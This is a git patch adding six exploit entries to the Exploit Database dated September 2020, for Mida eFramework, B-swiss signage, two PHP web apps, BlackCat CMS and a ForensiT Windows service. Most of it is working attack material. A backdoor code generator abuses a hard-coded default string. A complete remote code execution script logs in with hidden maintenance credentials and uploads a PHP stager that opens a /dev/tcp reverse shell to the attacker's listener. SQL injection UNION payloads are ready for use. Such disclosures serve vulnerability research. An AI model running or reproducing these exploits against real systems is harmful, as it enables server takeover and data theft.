From 87f49d442732fcc3f2e81ba0510cc4fec9b65eac Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 22 Sep 2020 05:02:05 +0000 Subject: [PATCH] DB: 2020-09-22 6 changes to exploits/shellcodes ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path Online Shop Project 1.0 - 'p' SQL Injection BlackCat CMS 1.3.6 - Cross-Site Request Forgery Seat Reservation System 1.0 - 'id' SQL Injection Mida eFramework 2.9.0 - Back Door Access B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution --- exploits/hardware/webapps/48823.py | 70 ++++++ exploits/multiple/webapps/48824.py | 346 +++++++++++++++++++++++++++++ exploits/php/webapps/48819.txt | 27 +++ exploits/php/webapps/48820.txt | 33 +++ exploits/php/webapps/48822.txt | 28 +++ exploits/windows/local/48821.txt | 35 +++ files_exploits.csv | 6 + 7 files changed, 545 insertions(+) create mode 100755 exploits/hardware/webapps/48823.py create mode 100755 exploits/multiple/webapps/48824.py create mode 100644 exploits/php/webapps/48819.txt create mode 100644 exploits/php/webapps/48820.txt create mode 100644 exploits/php/webapps/48822.txt create mode 100644 exploits/windows/local/48821.txt diff --git a/exploits/hardware/webapps/48823.py b/exploits/hardware/webapps/48823.py new file mode 100755 index 000000000..01ee1a3de --- /dev/null +++ b/exploits/hardware/webapps/48823.py @@ -0,0 +1,70 @@ +# Exploit Title: Mida eFramework 2.9.0 - Back Door Access +# Google Dork: Server: Mida eFramework +# Date: 2020-08-27 +# Exploit Author: elbae +# Vendor Homepage: https://www.midasolutions.com/ +# Software Link: http://ova-efw.midasolutions.com/ +# Reference: https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html +# Version: <= 2.9.0 +# CVE : CVE-2020-15921 + + +#! /usr/bin/python3 +# -*- coding: utf-8 -*- + +from datetime import date + +def print_disclaimer(): +print(""" +--------------------- +Disclaimer: +1) For testing purpose only. +2) Do not attack production environments. +3) Intended for educational purposes only and cannot be used for law +violation or personal gain. +4) The author is not responsible for any possible harm caused by this +material. +---------------------""") + +def print_info(): +print(""" +[*] Mida Solutions eFramework PDC Administrative Back-Door access +(CVE-2020-15921) +[*] Reference: +https://elbae.github.io/jekyll/update/2020/07/14/vulns-01.html +[*] This script can be used to retrieve the code which gives you the +possibility to change the password. +[*] How it works: +1) run the script +2) copy the output to the URL you want to access (i.e. +http://192.168.1.60:8090/PDC/extreq.php?code=THE-CODE) +3) change the password +4) access as admin with the password """) + +def main(): +print_info() +print_disclaimer() +abc = ['a', 'b', 'c', 'd', 'e', 'f', 'g', +'h', 'i', 'j', 'k', 'l', 'm', 'n', +'o', 'p', 'q', 'r', 's', 't', 'u', +'v', 'w', 'x', 'y', 'z'] +baseString = 'midasoluti' # default value from source code +today = date.today() +dateString = "{}0{:02d}0{}".format(today.day, today.month, today.year) +retString = "" + +for i in range(0,len(baseString)): +n = int(abc.index(baseString[i])) +m = int(dateString[i]) +s = n+m +if (s >= len(abc)): +s = m +retString += abc[s] +print("[+] Generated code: {}".format(retString)) +print("[?] Example URL: http://target:8090/PDC/extreq.php?code={0} +".format(retString)) +print("[?] Example URL: https://target/PDC/extreq.php?code={0} +".format(retString)) + +if __name__ == '__main__': +main() \ No newline at end of file diff --git a/exploits/multiple/webapps/48824.py b/exploits/multiple/webapps/48824.py new file mode 100755 index 000000000..c14042b55 --- /dev/null +++ b/exploits/multiple/webapps/48824.py @@ -0,0 +1,346 @@ +# Exploit Title: B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution +# Date: 2020-08-27 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.b-swiss.com +# Version: <= 3.6.5 +# CVE : N/A + + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# +# +# B-swiss 3 Digital Signage System 3.6.5 Backdoor Remote Code Execution +# +# +# Vendor: B-Swiss SARL | b-tween Sarl +# Product web page: https://www.b-swiss.com +# Affected version: 3.6.5 +# 3.6.2 +# 3.6.1 +# 3.6.0 +# 3.5.80 +# 3.5.40 +# 3.5.20 +# 3.5.00 +# 3.2.00 +# 3.1.00 +# +# Summary: Intelligent digital signage made easy. To go beyond the +# possibilities offered, b-swiss allows you to create the communication +# solution for your specific needs and your graphic charter. You benefit +# from our experience and know-how in the realization of your digital +# signage project. +# +# Desc: The application suffers from an "authenticated" arbitrary +# PHP code execution. The vulnerability is caused due to the improper +# verification of uploaded files in 'index.php' script thru the 'rec_poza' +# POST parameter. This can be exploited to execute arbitrary PHP code +# by uploading a malicious PHP script file that will be stored in +# '/usr/users' directory. Due to an undocumented and hidden "maintenance" +# account 'admin_m' which has the highest privileges in the application, +# an attacker can use these hard-coded credentials to authenticate and +# use the vulnerable image upload functionality to execute code on the +# server. +# +# ======================================================================================== +# lqwrm@metalgear:~/prive$ python3 sign2.py 192.168.10.11 192.168.10.22 7777 +# [*] Checking target... +# [*] Good to go! +# [*] Checking for previous attempts... +# [*] All good. +# [*] Getting backdoor session... +# [*] Got master backdoor cookie: 0c1617103c6f50107d09cb94b3eafeb2 +# [*] Starting callback listener child thread +# [*] Starting handler on port 7777 +# [*] Adding GUI credentials: test:123456 +# [*] Executing and deleting stager file +# [*] Connection from 192.168.10.11:40080 +# [*] You got shell! +# id ; uname -or +# uid=33(www-data) gid=33(www-data) groups=33(www-data) +# 4.15.0-20-generic GNU/Linux +# exit +# *** Connection closed by remote host *** +# [?] Want me to remove the GUI credentials? y +# [*] Removing... +# [*] t00t! +# lqwrm@metalgear:~/prive$ +# ======================================================================================== +# +# Tested on: Linux 5.3.0-46-generic x86_64 +# Linux 4.15.0-20-generic x86_64 +# Linux 4.9.78-xxxx-std-ipv6-64 +# Linux 4.7.0-040700-generic x86_64 +# Linux 4.2.0-27-generic x86_64 +# Linux 3.19.0-47-generic x86_64 +# Linux 2.6.32-5-amd64 x86_64 +# Darwin 17.6.0 root:xnu-4570.61.1~1 x86_64 +# macOS 10.13.5 +# Microsoft Windows 7 Business Edition SP1 i586 +# Apache/2.4.29 (Ubuntu) +# Apache/2.4.18 (Ubuntu) +# Apache/2.4.7 (Ubuntu) +# Apache/2.2.22 (Win64) +# Apache/2.4.18 (Ubuntu) +# Apache/2.2.16 (Debian) +# PHP/7.2.24-0ubuntu0.18.04.6 +# PHP/5.6.40-26+ubuntu18.04.1+deb.sury.org+1 +# PHP/5.6.33-1+ubuntu16.04.1+deb.sury.org+1 +# PHP/5.6.31 +# PHP/5.6.30-10+deb.sury.org~xenial+2 +# PHP/5.5.9-1ubuntu4.17 +# PHP/5.5.9-1ubuntu4.14 +# PHP/5.3.10 +# PHP/5.3.13 +# PHP/5.3.3-7+squeeze16 +# PHP/5.3.3-7+squeeze17 +# MySQL/5.5.49 +# MySQL/5.5.47 +# MySQL/5.5.40 +# MySQL/5.5.30 +# MySQL/5.1.66 +# MySQL/5.1.49 +# MySQL/5.0.77 +# MySQL/5.0.12-dev +# MySQL/5.0.11-dev +# MySQL/5.0.8-dev +# phpMyAdmin/3.5.7 +# phpMyAdmin/3.4.10.1deb1 +# phpMyAdmin/3.4.7 +# phpMyAdmin/3.3.7deb7 +# WampServer 3.2.0 +# Acore Framework 2.0 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# Macedonian Information Security Research and Development Laboratory +# Zero Science Lab - https://www.zeroscience.mk - @zeroscience +# +# +# Advisory ID: ZSL-2020-5590 +# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5590.php +# +# +# 13.06.2020 +# + +from http.cookiejar import DefaultCookiePolicy# #yciloPeikooCtluafeD tropmi rajeikooc.ptth mofr +from http.cookiejar import CookieJar# oOo #raJeikooC tropmi rajeikooc.ptth mofr +from six.moves import input# #-----------------+-----------------# #tupni trompi sevom.xis morf +from time import sleep# | 01 | 04 | #peels trompi emit morf +import urllib.request# | | | | #tseuqer.billru tropmi +import urllib.parse# | | | | #esrap.billru tropmi +import telnetlib# | | | #biltenlet tropmi +import threading# | | | | #gnidaerht tropmi +import requests# | | | | #stseuqer tropmi +import socket# | | o | #tekcos tropmi +import sys,re# | | | #er,sys tropmi +############## #-----------------+-----------------# ############## +############### oOo ############### +################ | ################ +#################### Y #################### +############################ _ ############################ +############################################################################################### + +class Sign: + + def __init__(self): + self.username = b"\x61\x64\x6d\x69\x6e\x5f\x6d" + self.altruser = b"\x62\x2d\x73\x77\x69\x73\x73" + self.password = b"\x44\x50\x36\x25\x57\x33\x64" + self.agent = "SignageBot/1.02" + self.fileid = "251" + self.payload = None + self.answer = False + self.params = None + self.rhost = None + self.lhost = None + self.lport = None + self.send = None + + def env(self): + if len(sys.argv) != 4: + self.usage() + else: + self.rhost = sys.argv[1] + self.lhost = sys.argv[2] + self.lport = int(sys.argv[3]) + if not "http" in self.rhost: + self.rhost = "http://{}".format(self.rhost) + + def usage(self): + self.roger() + print("Usage: python3 {} ".format(sys.argv[0])) + print("Example: python3 {} 192.168.10.11:80 192.168.10.22 7777\n".format(sys.argv[0])) + exit(0) + + def roger(self): + waddup = """ + ____________________ + / \\ + ! B-swiss 3 ! + ! RCE ! + \____________________/ + ! ! + ! ! + L_ ! + / _)! + / /__L +____________/ (____) + (____) +____________ (____) + \_(____) + ! ! + ! ! + \__/ + """ + print(waddup) + + def test(self): + print("[*] Checking target...") + try: + r = requests.get(self.rhost) + response = r.text + if not "B-swiss" in response: + print("[!] Not a b-swiss system") + exit(0) + if "B-swiss" in response: + print("[*] Good to go!") + next + else: + exit(-251) + except Exception as e: + print("[!] Ney ney: {msg}".format(msg=e)) + exit(-1) + + def login(self): + token = "" + cj = CookieJar() + self.params = {"locator" : "visitor.ProcessLogin", + "username" : self.username, + "password" : self.password, + "x" : "0", + "y" : "0"} + + damato = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj)) + damato.addheaders.pop() + damato.addheaders.append(("User-Agent", self.agent)) + + try: + print("[*] Getting backdoor session...") + damato.open(self.rhost + "/index.php", urllib.parse.urlencode(self.params).encode('utf-8')) + for cookie in cj: + token = cookie.value + print("[*] Got master backdoor cookie: "+token) + except urllib.request.URLError as e: + print("[!] Connection error: {}".format(e.reason)) + + return token + + def upload(self): + j = "\r\n" + self.cookies = {"PNU_RAD_LIB" : self.rtoken} + self.headers = {"Cache-Control" : "max-age=0", + "Content-Type" : "multipart/form-data; boundary=----j", + "User-Agent" : self.agent, + "Accept-Encoding" : "gzip, deflate", + "Accept-Language" : "en-US,en;q=0.9", + "Connection" : "close"} + + self.payload = " /dev/tcp/"+self.lhost+"/"+str(self.lport)+" <&1;rm "+self.fileid+".php'\");" + + print("[*] Adding GUI credentials: test:123456") + # rec_adminlevel values: + # ---------------------- + # 100000 - "b-swiss Maintenance Admin" (Undocumented privilege) + # 7 - "B-swiss admin" <---------------------------------------------------------------------------------------+ + # 8 - Other | + # | + self.send = "------j{}Content-Disposition: form-data; ".format(j)# | + self.send += "name=\"locator\"{}Users.Save{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"page\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"sort\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"id\"{}{}{}------j\r\nContent-Disposition: form-data; ".format(j*2,self.fileid,j,j)# | + self.send += "name=\"ischildgrid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"inpopup\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"ongridpage\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"rowid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"preview_screenid\"{}------j{}Content-Disposition: form-data; ".format(j*3,j)# | + self.send += "name=\"rec_firstname\"{}TestF{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_lastname\"{}TestL{}------j{}Content-Disposition: form-data; ".format(j*2,j,2)# | + self.send += "name=\"rec_email\"{}test@test.cc{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_username\"{}test{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_password\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_cpassword\"{}123456{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# | + self.send += "name=\"rec_adminlevel\"{}7{}------j{}Content-Disposition: form-data; ".format(j*2,j,j)# <----------+ + self.send += "name=\"rec_status\"{}1{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_poza\"; filename=\"Blank.jpg.php\"{}Content-Type: application/octet-stream{}".format(j,j*2) + self.send += self.payload+"{}------j{}Content-Disposition: form-data; ".format(j,j) + self.send += "name=\"rec_poza_face\"{}C:\\fakepath\\Blank.jpg{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_language\"{}french-sw{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_languages[]\"{}2{}------j{}Content-Disposition: form-data; ".format(j*2,j,j) + self.send += "name=\"rec_can_change_password\"{}1{}------j--{}".format(j*2,j,j) + + requests.post(self.rhost+"/index.php", headers=self.headers, cookies=self.cookies, data=self.send) + print("[*] Executing and deleting stager file") + r = requests.get(self.rhost+"/usr/users/"+self.fileid+".php") + sleep(1) + + self.answer = input("[?] Want me to remove the GUI credentials? ").strip() + if self.answer[0] == "y" or self.answer[0] == "Y": + print("[*] Removing...") + requests.get(self.rhost+"/index.php?locator=Users.Delete&id="+self.fileid, headers=self.headers, cookies=self.cookies) + if self.answer[0] == "n" or self.answer[0] == "N": + print("[*] Cool!") + print("[*] t00t!") + exit(-1) + + def razmisluju(self): + print("[*] Starting callback listener child thread") + konac = threading.Thread(name="ZSL", target=self.phone) + konac.start() + sleep(1) + self.upload() + + def fish(self): + r = requests.get(self.rhost+"/usr/users/", verify=False, allow_redirects=False) + response = r.text + print("[*] Checking for previous attempts...") + if not ".php" in response: + print("[*] All good.") + elif "251.php" in response: + print("[!] Stager file \"{}.php\" still present on the server".format(self.fileid)) + + def phone(self): + telnetus = telnetlib.Telnet() + print("[*] Starting handler on port {}".format(self.lport)) + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind(("0.0.0.0", self.lport)) + while True: + try: + s.settimeout(7) + s.listen(1) + conn, addr = s.accept() + print("[*] Connection from {}:{}".format(addr[0], addr[1])) + telnetus.sock = conn + except socket.timeout as p: + print("[!] No outgoing calls :( ({msg})".format(msg=p)) + print("[+] Check your port mappings or increase timeout") + s.close() + exit(0) + break + + print("[*] You got shell!") + telnetus.interact() + conn.close() + + def main(self): + self.env() + self.test() + self.fish() + self.rtoken = self.login() + self.razmisluju() + +if __name__ == '__main__': + Sign().main() \ No newline at end of file diff --git a/exploits/php/webapps/48819.txt b/exploits/php/webapps/48819.txt new file mode 100644 index 000000000..7c2b5bc3c --- /dev/null +++ b/exploits/php/webapps/48819.txt @@ -0,0 +1,27 @@ +# Exploit Title: Online Shop Project 1.0 - 'p' SQL Injection +# Date: 2020-09-20 +# Exploit Author: Augkim +# Vendor Homepage: https://www.sourcecodester.com/php/14448/online-shop-project-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-shop-using-php.zip +# Tested on: Apache2 + + +GET +/shop/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20- +HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) +Gecko/20100101 Firefox/80.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close +Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Origin: foo.example.org + + +PoC: +/URL/product.php?p=2%20UNION%20ALL%20SELECT%201,2,3,4,@@datadir,6,7,8--%20- \ No newline at end of file diff --git a/exploits/php/webapps/48820.txt b/exploits/php/webapps/48820.txt new file mode 100644 index 000000000..05c1aaa63 --- /dev/null +++ b/exploits/php/webapps/48820.txt @@ -0,0 +1,33 @@ +# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery +# Date: 2020-06-01 +# Exploit Author: Noth +# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS +# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS +# Version: v1.3.6 +# CVE : CVE-2020-25453 + +BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that +allows remote arbitrary code execution . + +PoC (Remove the csrf_token value) : + + +------------------------------------------------------------------------------------------------------------------------------------------------- + + + +
+ + + + + + + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/48822.txt b/exploits/php/webapps/48822.txt new file mode 100644 index 000000000..ba8e2eed3 --- /dev/null +++ b/exploits/php/webapps/48822.txt @@ -0,0 +1,28 @@ +# Exploit Title: Seat Reservation System 1.0 - 'id' SQL Injection +# Date: 2020-09-20 +# Exploit Author: Augkim +# Vendor Homepage: https://www.sourcecodester.com/php/14452/seat-reservation-system-movie-theater-project-using-phpmysql.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/seat-reservation-system-using-php_0.zip +# Tested on: Apache2 + + +POST +/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- +HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) +Gecko/20100101 Firefox/80.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding: gzip, deflate +Referer: http://localhost/sere/ +Connection: close +Cookie: PHPSESSID=lmuj4akmh6q1flmcbnuisgttom +Upgrade-Insecure-Requests: 1 +Cache-Control: max-age=0 +Origin: foo.example.org + + +PoC: +/URL/index.php?page=reserve&id=''union%20select%201,version(),3,4,5,6,7,8-- \ No newline at end of file diff --git a/exploits/windows/local/48821.txt b/exploits/windows/local/48821.txt new file mode 100644 index 000000000..af37159bf --- /dev/null +++ b/exploits/windows/local/48821.txt @@ -0,0 +1,35 @@ +# Exploit Title: ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path +# Discovery by: Burhanettin Özgenç +# Discovery Date: 2020-09-15 +# Vendor Homepage: https://www.forensit.com/downloads.html +# Tested Version: 2.2.0.4 +# Vulnerability Type: Unquoted Service Path +# Tested on OS: Windows 10 Pro x64 + +# Step to discover Unquoted Service Path: + +C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "ForensiTAppxService" | findstr /i /v """ + +ForensiT AppX Management Service ForensiTAppxService C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe Auto + +# Service info: + +C:\>sc qc ForensiTAppxService +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: ForensiTAppxService + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : C:\Program Files (x86)\ForensiT\AppX Management Service\ForensiTAppxService.exe + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : ForensiT AppX Management Service + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +# Exploit: +# A successful attempt would require the local user to be able to insert their code in the system +# root path undetected by the OS or other security applications where it could potentially be executed +# during application startup or reboot. If successful, the local user's code would execute with +# the elevated privileges of the application. \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 059414708..17720c850 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10382,6 +10382,7 @@ id,file,description,date,author,type,platform,port 48808,exploits/windows/local/48808.txt,"Rapid7 Nexpose Installer 6.6.39 - 'nexposeengine' Unquoted Service Path",2020-09-14,LiquidWorm,local,windows, 48810,exploits/windows/local/48810.txt,"Pearson Vue VTS 2.3.1911 Installer - 'VUEApplicationWrapper' Unquoted Service Path",2020-09-14,Jok3r,local,windows, 48815,exploits/windows/local/48815.txt,"Windows TCPIP Finger Command - C2 Channel and Bypassing Security Software",2020-09-16,hyp3rlinx,local,windows, +48821,exploits/windows/local/48821.txt,"ForensiTAppxService 2.2.0.4 - 'ForensiTAppxService.exe' Unquoted Service Path",2020-09-21,"Burhanettin Ozgenc",local,windows, 42887,exploits/linux/local/42887.c,"Linux Kernel 3.10.0-514.21.2.el7.x86_64 / 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation",2017-09-26,"Qualys Corporation",local,linux, 42890,exploits/windows/local/42890.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Image File Execution Bypass",2017-09-28,hyp3rlinx,local,windows, 42918,exploits/windows/local/42918.py,"DiskBoss Enterprise 8.4.16 - 'Import Command' Local Buffer Overflow",2017-09-28,"Touhid M.Shaikh",local,windows, @@ -40643,6 +40644,11 @@ id,file,description,date,author,type,platform,port 48814,exploits/php/webapps/48814.txt,"Piwigo 2.10.1 - Cross Site Scripting",2020-09-16,Iridium,webapps,php, 48817,exploits/multiple/webapps/48817.py,"SpamTitan 7.07 - Remote Code Execution (Authenticated)",2020-09-18,"Felipe Molina",webapps,multiple, 48818,exploits/php/webapps/48818.py,"Mantis Bug Tracker 2.3.0 - Remote Code Execution (Unauthenticated)",2020-09-18,"Nikolas Geiselman",webapps,php, +48819,exploits/php/webapps/48819.txt,"Online Shop Project 1.0 - 'p' SQL Injection",2020-09-21,Augkim,webapps,php, +48820,exploits/php/webapps/48820.txt,"BlackCat CMS 1.3.6 - Cross-Site Request Forgery",2020-09-21,Noth,webapps,php, +48822,exploits/php/webapps/48822.txt,"Seat Reservation System 1.0 - 'id' SQL Injection",2020-09-21,Augkim,webapps,php, +48823,exploits/hardware/webapps/48823.py,"Mida eFramework 2.9.0 - Back Door Access",2020-09-21,elbae,webapps,hardware, +48824,exploits/multiple/webapps/48824.py,"B-swiss 3 Digital Signage System 3.6.5 - Remote Code Execution",2020-09-21,LiquidWorm,webapps,multiple, 42884,exploits/multiple/webapps/42884.py,"Fibaro Home Center 2 - Remote Command Execution / Privilege Escalation",2017-02-22,forsec,webapps,multiple, 42805,exploits/php/webapps/42805.txt,"WordPress Plugin WPAMS - SQL Injection",2017-09-26,"Ihsan Sencan",webapps,php, 42889,exploits/php/webapps/42889.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Private Key Disclosure",2017-09-28,hyp3rlinx,webapps,php,